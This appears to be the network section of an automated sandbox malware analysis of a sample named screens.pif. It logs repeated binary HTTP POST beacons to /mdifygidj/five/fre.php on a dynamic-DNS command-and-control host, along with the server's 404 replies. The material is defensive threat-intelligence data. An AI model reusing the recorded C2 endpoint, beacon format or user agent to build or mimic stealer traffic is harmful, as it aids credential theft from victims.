Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\screens.pif

Code function: 5_2_00404ED4 recv,

5_2_00404ED4

Source: global traffic

Source: global traffic	DNS traffic detected: DNS query: www.sodiumlaurethsulfatedesyroyer.com
Source: global traffic	DNS traffic detected: DNS query: freighteighttwocam.ddns.net

Source: unknown

HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 172Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:47 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:47 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:55 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:56 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:58 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:59 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:01 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:03 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:03 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:04 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:05 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:06 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:07 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:08 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:09 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:10 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:11 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:12 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:13 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:14 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:14 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:16 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:17 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:19 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:20 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:21 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:21 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:22 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:23 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:24 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:25 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:26 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:27 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:28 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:29 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:29 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:30 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:32 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:33 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:33 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:33 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:35 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:38 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:42 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:43 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:44 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:45 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:46 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:46 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:47 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:48 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:50 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
